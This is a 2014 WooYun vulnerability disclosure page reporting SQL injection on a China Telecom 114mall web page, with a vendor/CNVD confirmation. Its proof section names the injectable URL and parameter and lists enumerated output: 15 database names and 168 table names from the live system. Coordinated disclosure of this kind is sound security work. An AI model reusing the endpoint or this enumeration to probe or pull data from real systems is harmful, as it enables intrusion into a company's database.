当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-056929

漏洞标题:中国电信百事通商城SQL注射一枚dbo权限

相关厂商:中国电信

漏洞作者: 雅柏菲卡

提交时间:2014-04-13 16:44

修复时间:2014-05-28 16:45

公开时间:2014-05-28 16:45

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-04-13: 细节已通知厂商并且等待厂商处理中
2014-04-18: 厂商已经确认,细节仅向厂商公开
2014-04-28: 细节向核心白帽子及相关领域专家公开
2014-05-08: 细节向普通白帽子公开
2014-05-18: 细节向实习白帽子公开
2014-05-28: 细节向公众公开

简要描述:

............

详细说明:

...................

漏洞证明:

http://www.114mall.cn/tjsaima/history.aspx?username=jxhebin
available databases [15]:
[*] AdvSystem
[*] ExchangeReport
[*] master
[*] MobileInfoSearch
[*] MobileInfoSearch_Second
[*] model
[*] msdb
[*] my114mall
[*] nbmanage
[*] Northwind
[*] poi
[*] Present
[*] pubs
[*] SpecialLocalProduct
[*] tempdb
[168 tables]
+--------------------------------------+
| dbo.ANSWERLOG                        |
| dbo.ANSWERS                          |
| dbo.AUTH                             |
| dbo.OutCardsOrder                    |
| dbo.PD_OPTIONS                       |
| dbo.PD_ROLES                         |
| dbo.PD_USERS                         |
| dbo.Packages                         |
| dbo.TB_AD                            |
| dbo.TB_AD_AnswerLog                  |
| dbo.TB_AD_BlackList                  |
| dbo.TB_AD_CompInfo                   |
| dbo.TB_AD_Gift_Log                   |
| dbo.TB_AD_HotSpot_UserSet            |
| dbo.TB_AD_Link                       |
| dbo.TB_AD_Question                   |
| dbo.TB_AD_Question_NoActiveUser      |
| dbo.TB_AD_Question_Surpise_UserLog   |
| dbo.TB_AD_Question_Surprise_Param    |
| dbo.TB_AD_Question_UserLog           |
| dbo.TB_AD_SpecialUser                |
| dbo.TB_AD_Static                     |
| dbo.TB_AD_ViewLog                    |
| dbo.TB_AD_ViewLog200803              |
| dbo.TB_AD_ViewLog_Gardener           |
| dbo.TB_Abnormal_IP                   |
| dbo.TB_Active_AD                     |
| dbo.TB_Bus                           |
| dbo.TB_Bus_Index                     |
| dbo.TB_Comment                       |
| dbo.TB_Commodity_Log                 |
| dbo.TB_Commodity_Price               |
| dbo.TB_ConsumeLog                    |
| dbo.TB_Duma_UserInfo                 |
| dbo.TB_Err_Log                       |
| dbo.TB_Forbid                        |
| dbo.TB_Game_Log                      |
| dbo.TB_Game_Log200704                |
| dbo.TB_Game_Log200711                |
| dbo.TB_Game_Lucky_FreeUserLog        |
| dbo.TB_Game_Lucky_Param              |
| dbo.TB_Game_Param                    |
| dbo.TB_Game_WinLog                   |
| dbo.TB_Gift_Grab                     |
| dbo.TB_Gift_Grab_Invoice             |
| dbo.TB_Gift_Grab_List                |
| dbo.TB_Gift_Grab_Log                 |
| dbo.TB_Gift_Lock                     |
| dbo.TB_Grab_Log                      |
| dbo.TB_Info                          |
| dbo.TB_Info_Hot                      |
| dbo.TB_Integral_Log                  |
| dbo.TB_LOCK_ERROR                    |
| dbo.TB_Lock                          |
| dbo.TB_Lucky100                      |
| dbo.TB_Lucky100_Award                |
| dbo.TB_Lucky100_WinLog               |
| dbo.TB_Lucky100_temp                 |
| dbo.TB_Lucky_DayUserLog              |
| dbo.TB_Lucky_Gift                    |
| dbo.TB_Lucky_Log                     |
| dbo.TB_Lucky_RunLog                  |
| dbo.TB_Lucky_Temp                    |
| dbo.TB_Lucky_Ticket                  |
| dbo.TB_Lucky_Week_UserAct            |
| dbo.TB_Lucky_Week_UserLogin          |
| dbo.TB_Lucky_WinLog                  |
| dbo.TB_MobileGame_Log                |
| dbo.TB_MobileGame_WinLog             |
| dbo.TB_Plan                          |
| dbo.TB_Puzzles_Detail                |
| dbo.TB_ReStart                       |
| dbo.TB_TEST                          |
| dbo.TB_Theater                       |
| dbo.TB_Ticket                        |
| dbo.TB_TicketCancel_Log              |
| dbo.TB_TicketSell_Log                |
| dbo.TB_Ticket_Grab                   |
| dbo.TB_Ticket_Special                |
| dbo.TB_Time_Info                     |
| dbo.TB_User_DayAct                   |
| dbo.TB_ViewAD_Log                    |
| dbo.TB_Welcome_Log                   |
| dbo.TV_AD_Question_UserLog1          |
| dbo.TV_AD_Question_Userlog           |
| dbo.TV_AD_ViewLog                    |
| dbo.TV_Bus_Search2                   |
| dbo.TV_Gift_Grab                     |
| dbo.TV_Gift_Grab_Log                 |
| dbo.TV_Lucky100                      |
| dbo.TV_Lucky100_detail               |
| dbo.TV_Lucky_WinLog                  |
| dbo.TV_Ticket                        |
| dbo.TV_Ticket_Grab                   |
| dbo.T_NEWS                           |
| dbo.Tv_Lucky100_Detaila              |
| dbo.commend                          |
| dbo.dtproperties                     |
| dbo.pbcatcol                         |
| dbo.pbcatedt                         |
| dbo.pbcatfmt                         |
| dbo.pbcattbl                         |
| dbo.pbcatvld                         |
| dbo.sysconstraints                   |
| dbo.syssegments                      |
| dbo.t_tradeCount                     |
| dbo.tb_act_do_lock                   |
| dbo.tb_active_temp                   |
| dbo.tb_ad_viewlog200804              |
| dbo.tb_ad_viewlog200902              |
| dbo.tb_ad_viewlog200903              |
| dbo.tb_ad_viewlog200904              |
| dbo.tb_ad_viewlog200905              |
| dbo.tb_ad_viewlog200906              |
| dbo.tb_ad_viewlog200907              |
| dbo.tb_ad_viewlog200908              |
| dbo.tb_ad_viewlog200909              |
| dbo.tb_ad_viewlog200910              |
| dbo.tb_ad_viewlog200911              |
| dbo.tb_ad_viewlog200912              |
| dbo.tb_ad_viewlog201002              |
| dbo.tb_ad_viewlog201003              |
| dbo.tb_ad_viewlog201004              |
| dbo.tb_ad_viewlog201005              |
| dbo.tb_ad_viewlog201006              |
| dbo.tb_ad_viewlog201011              |
| dbo.tb_ad_viewlog201012              |
| dbo.tb_ad_viewlog201210              |
| dbo.tb_ad_viewlog201211              |
| dbo.tb_ad_viewlog201212              |
| dbo.tb_ad_viewlog201301              |
| dbo.tb_ad_viewlog201302              |
| dbo.tb_ad_viewlog201303              |
| dbo.tb_ad_viewlog201304              |
| dbo.tb_ad_viewlog201305              |
| dbo.tb_ad_viewlog201306              |
| dbo.tb_ad_viewlog201307              |
| dbo.tb_ad_viewlog201308              |
| dbo.tb_ad_viewlog201309              |
| dbo.tb_ad_viewlog201310              |
| dbo.tb_ad_viewlog201311              |
| dbo.tb_ad_viewlog201312              |
| dbo.tb_ad_viewlog201401              |
| dbo.tb_ad_viewlog201402              |
| dbo.tb_ad_viewlog201403              |
| dbo.tb_ad_viewlog201404              |
| dbo.tb_ad_viewlogerror               |
| dbo.tb_cata                          |
| dbo.tb_duma                          |
| dbo.tb_duma2008                      |
| dbo.tb_duma_back                     |
| dbo.tb_duma_comment                  |
| dbo.tb_duma_userinfotest             |
| dbo.tb_infotest                      |
| dbo.tb_luck_ip                       |
| dbo.tb_lucky_winlogtest              |
| dbo.tb_temp                          |
| dbo.tv_ad                            |
| dbo.tv_saima                         |
| dbo.tv_saima_bet                     |
| dbo.tv_saima_bet_1                   |
| dbo.tv_saima_horse                   |
| dbo.tv_test                          |
| my114mall2008.DC_answerlog           |
| my114mall2008.DC_givePresentLog      |
| my114mall2008.DC_userinfo            |
| my114mall2008.Logs_file              |
| my114mall2008.tb_ad_viewlog_20090224 |
+--------------------------------------+

修复方案:

................

版权声明:转载请注明来源 雅柏菲卡@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-04-18 09:37

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT直接通报中国电信集团公司处置。

最新状态:

暂无